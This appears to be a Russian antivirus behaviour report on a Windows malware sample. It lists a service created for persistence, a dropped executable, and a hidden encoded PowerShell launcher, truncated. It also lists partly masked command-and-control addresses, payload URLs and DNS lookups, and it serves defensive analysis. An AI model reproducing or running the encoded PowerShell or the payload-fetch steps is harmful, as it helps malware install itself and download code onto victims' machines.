Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\EAPQEC] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\EAPQEC] 'ImagePath' = '"<SYSTEM32>\EAPQEC\EAPQEC.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAHAAcQBvAG4AYQBiAHkAbABrAGUAPQAnAFIAdgB5AHgAcwBnAHMAcgBuAGEAJwA7ACQATABqAGUAYgBnAGsAeQBzAGgAIAA9ACAAJwAzADMAMAAnADsAJABYAGcAdQBoAGUAYgBzAGkAYwBuAG4AawA9ACcAUAB2AHIAdQBnAGwAcwBqAGwAbQAnAD...
- %HOMEPATH%\330.exe
- %HOMEPATH%\330.exe в <SYSTEM32>\eapqec\eapqec.exe
- '47.##5.214.239':80
- '47.##5.214.239':443
- '20#.#46.22.34':443
- http://al###sonq.com/web_map/UkwFMlO/
- http://no#####.strzelecki.org/wp-includes/6jGh/
- http://20#.##6.22.34:443/905STu/c5y0t7cw8NCQG/QYcYPkogxs6PTmpnN/ via 20#.#46.22.34
- DNS ASK al###sonq.com
- DNS ASK no#####.strzelecki.org
- '%HOMEPATH%\330.exe'
- '<SYSTEM32>\eapqec\eapqec.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAHAAcQBvAG4AYQBiAHkAbABrAGUAPQAnAFIAdgB5AHgAcwBnAHMAcgBuAGEAJwA7ACQATABqAGUAYgBnAGsAeQBzAGgAIAA9ACAAJwAzADMAMAAnADsAJABYAGcAdQBoAGUAYgBzAGkAYwBuAG4AawA9ACcAUAB2AHIAdQBnAGwAcwBqAGwAbQAnAD...' (со скрытым окном)